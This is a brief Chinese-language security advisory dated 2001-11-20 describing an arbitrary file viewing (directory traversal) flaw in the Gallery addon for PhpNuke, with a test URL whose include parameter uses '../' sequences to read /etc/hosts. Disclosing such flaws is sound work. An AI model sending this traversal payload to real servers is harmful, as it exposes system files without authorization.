Gallery Addon for PhpNuke 存在任意文件可查看漏洞

发布时间：2001-11-20
更新时间：2001-11-20
严重程度：中
威胁程度：远程非授权文件存取
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Gallery Addon for PhpNuke

详细描述
Gallery是基于WEB的图片库管理程序，可以使用认证管理。

其中对../..字符没有很好处理，可以导致任意文件以WEB用户身份被查看。

测试代码
http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&
name=gallery&file=index&inclu
de=../../../../../../etc/hosts

解决方案
尚无

相关信息
Cabezon Aurélien (aurelien.cabezon@isecurelabs.com)
gallery主页：http://www.menalto.com/projects/gallery-nuke/

最近严重漏洞

Gallery Addon for PhpNuke 存在任意文件可查看漏洞